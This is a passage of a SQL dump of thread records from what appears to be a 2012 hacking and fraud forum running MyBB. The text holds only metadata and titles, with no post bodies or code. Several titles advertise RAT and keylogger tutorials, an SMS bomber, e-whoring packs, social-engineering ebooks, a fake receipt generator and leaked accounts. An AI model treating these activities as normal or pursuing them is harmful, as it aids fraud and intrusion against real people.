`closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('210', '3', 'Moved Successfully!!!', '0', '0', '0', '1', 't3h jok3r', '1345853465', '835', '1345951282', 'Apathy', '2', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('211', '3', '[Announcement] Marketplace Removed', '0', '0', '0', '82', 'iTzIpod', '1345857526', '844', '1345858239', 't3h jok3r', '1', '24', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('212', '58', 'Official New Groups Questions, Inquires, Policies and More', '0', '0', '0', '1', 't3h jok3r', '1345858254', '849', '1351197735', 'iTzIpod', '82', '408', '60', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('213', '58', 'What group(s) would you like to see?', '0', '0', '0', '20', 'JakeUS', '1345858295', '850', '1346078654', 'iTzIpod', '82', '43', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('214', '52', '[tut] Creating a IPod PID Generator', '0', '0', '0', '4', 'Triple H', '1345859244', '856', '1349730293', 'BreShiE', '232', '35', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('215', '52', 'Adf.ly BOT source code', '0', '0', '0', '4', 'Triple H', '1345859357', '857', '1346644540', 'spacefish36', '8', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('216', '52', 'Making a world wide SMS Bomber in VB.net - TUT', '0', '0', '0', '4', 'Triple H', '1345859626', '858', '1347237893', 'spacefish36', '8', '31', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('217', '24', '[Fun] Find the SEX of your Computer...!!', '0', '0', '0', '54', 'Sin Cara', '1345868433', '882', '1345945651', 'duhuh', '90', '21', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('218', '34', 'NEFantasy\'s #1 Graphic Pack (2.15 GB)', '0', '0', '0', '82', 'iTzIpod', '1345869611', '885', '1345869611', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('219', '35', 'My Designs', '0', '0', '0', '82', 'iTzIpod', '1345871321', '888', '1345952188', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('234', '17', 'Free E-Whoring packs website plus free PORN', '0', '0', '0', '1', 't3h jok3r', '1345938993', '977', '1352180743', 't3h jok3r', '1', '33', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('220', '55', 'Windows 7 Ultimate', '0', '0', '0', '112', '??????Z', '1345901648', '899', '1345984626', '??????Z', '112', '13', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('221', '7', 'L33t Hacking Advertisement Video', '0', '0', '0', '82', 'iTzIpod', '1345903215', '900', '1346015895', 't3h jok3r', '1', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('222', '34', 'Music Man Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345905811', '905', '1345905811', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('223', '34', 'Versus Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345906030', '906', '1345906030', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('224', '34', 'Metroid Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345906134', '907', '1345922749', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('225', '7', 'E-whoring Ebook very soon :)', '0', '0', '0', '54', 'Sin Cara', '1345908712', '914', '1345936454', 't3h jok3r', '1', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('226', '11', 'A Newbies Guide', '0', '0', '0', '54', 'Sin Cara', '1345910367', '919', '1350217502', 'mothered', '205', '35', '6', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('227', '13', 'hack twitter?', '0', '0', '0', '62', 'R?????zo?', '1345910796', '920', '1346417520', 'MinecraftGeek', '150', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('228', '12', '[TUT] A complete guide to RAT', '0', '0', '0', '54', 'Sin Cara', '1345911097', '921', '1346471922', 'Apathy', '2', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('229', '12', 'How to setup a Keylogger [tut]', '0', '0', '0', '53', 'sirchamp', '1345913509', '923', '1345939494', 't3h jok3r', '1', '30', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('230', '34', 'Graphics Resources [100000\'s of free resorces]', '0', '0', '0', '54', 'Sin Cara', '1345917649', '925', '1345956488', 'Sin Cara', '54', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('231', '4', 'Sup', '0', '0', '0', '127', 'Eucliwood', '1345918274', '929', '1346039607', 'NXK', '61', '47', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('232', '50', 'Triple H', '0', '0', '0', '53', 'sirchamp', '1345927812', '949', '1346169647', 'JakeUS', '20', '15', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('233', '58', 'Reviewers Group???', '0', '0', '0', '1', 't3h jok3r', '1345937266', '968', '1346074485', 't3h jok3r', '1', '34', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('235', '48', 'Experiences of MOD', '0', '0', '0', '1', 't3h jok3r', '1345940778', '980', '1346256198', 'iTzIpod', '82', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('236', '49', '[Suggestion] Reporting Posts', '0', '0', '0', '82', 'iTzIpod', '1345951020', '1002', '1346015718', 't3h jok3r', '1', '21', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('237', '35', 'My attempt at a smudge tag [learning]', '0', '0', '0', '2', 'Apathy', '1345951622', '1010', '1345952881', 'iTzIpod', '82', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('238', '56', 'Ban the user above you', '0', '0', '0', '82', 'iTzIpod', '1345953707', '1021', '1352648045', 'iTzIpod', '82', '237', '89', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('239', '7', '1000th Post', '0', '0', '0', '82', 'iTzIpod', '1345954747', '1022', '1346073369', 'HoverCatz', '67', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('240', '3', '[Bug] Complaints & Rep Abuse Support', '0', '0', '0', '82', 'iTzIpod', '1345957663', '1025', '1346100208', 't3h jok3r', '1', '26', '6', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('241', '49', '[Suggestion] Questions Section', '0', '0', '0', '82', 'iTzIpod', '1345958174', '1028', '1346016098', 't3h jok3r', '1', '12', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('244', '33', 'Tips on rating GFX', '0', '0', '0', '82', 'iTzIpod', '1345961374', '1041', '1345986783', 'Apathy', '2', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('242', '34', 'Will Smith Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345959364', '1035', '1345959364', 'iTzIpod', '82', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('243', '34', 'Black Spiderman Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345959485', '1036', '1345959485', 'iTzIpod', '82', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('247', '16', '[Free][EBook] How to SE Pringles', '0', '0', '0', '82', 'iTzIpod', '1345991171', '1055', '1348618162', 'iTzIpod', '82', '28', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('246', '11', 'Safety for Safety\'s sake', '0', '0', '0', '48', 'BurnsH4X', '1345978650', '1045', '1346017364', 'swa4567', '10', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('248', '16', '[Free][EBook] How to SE a 3DS', '0', '0', '0', '82', 'iTzIpod', '1345991325', '1056', '1348832469', 'iTzIpod', '82', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('249', '56', 'Last person to reply, wins!', '0', '0', '0', '82', 'iTzIpod', '1345991527', '1057', '1352648005', 'iTzIpod', '82', '112', '41', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('250', '42', 'Saturday is deadliest day in Syrian civil war', '0', '0', '0', '82', 'iTzIpod', '1345994060', '1060', '1346016502', 't3h jok3r', '1', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('251', '19', '[Junk]sig', '0', '0', '0', '127', 'Eucliwood', '1346000124', '1063', '1346074969', 't3h jok3r', '1', '22', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('252', '54', 'August 27, 2012 XXXX Accounts', '0', '0', '0', '1', 't3h jok3r', '1346021770', '1089', '1346812916', 't3h jok3r', '1', '29', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('253', '56', 'Count to 200', '0', '0', '0', '84', 'Thunder™', '1346045869', '1106', '1352595874', 'XxTREYZxX', '257', '157', '62', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('254', '49', 'Gamers Section', '0', '0', '0', '84', 'Thunder™', '1346046025', '1107', '1347465982', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('255', '5', 'IMPORTANT!!!', '0', '0', '0', '1', 't3h jok3r', '1346074273', '1121', '1346253574', 't3h jok3r', '1', '8', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('256', '3', '[Bug] View New Posts', '0', '0', '0', '82', 'iTzIpod', '1346082742', '1139', '1346100038', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('257', '35', 'Nice Video Edit', '0', '0', '0', '82', 'iTzIpod', '1346084981', '1141', '1348832128', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('258', '58', 'Recurring Team now...', '0', '0', '0', '54', 'Sin Cara', '1346085425', '1142', '1346101615', 't3h jok3r', '1', '29', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('259', '34', 'Instant\'s GFX Guide', '0', '0', '0', '82', 'iTzIpod', '1346093539', '1147', '1346645677', 'iTzIpod', '82', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('260', '34', 'Afterburn Photoshop Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346095927', '1150', '1346096112', 'iTzIpod', '82', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('261', '34', 'Metroid Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346096034', '1152', '1346096034', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('262', '43', 'Amazon Receipt Generator V.2', '0', '0', '0', '1', 't3h jok3r', '1346104450', '1171', '1346459638', 't3h jok3r', '1', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('263', '30', 'Emillionforums premium content: Extreme wiki poster', '0', '0', '0', '2', 'Apathy', '1346105023', '1172', '1346105023', 'Apathy', '2', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('264', '2', 'Something', '0', '0', '0', '1', 't3h jok3r', '1346105024', '1173', '1346115847', 't3h jok3r', '1', '55', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('265', '3', 'Apathy Demoted', '0', '0', '0', '1', 't3h jok3r', '1346109820', '1184', '1346620249', 'iTzIpod', '82', '124', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('266', '47', 'Win a Free Netflix Account~', '0', '0', '0', '82', 'iTzIpod', '1346111714', '1186', '1348963581', 'iTzIpod', '82', '55', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, 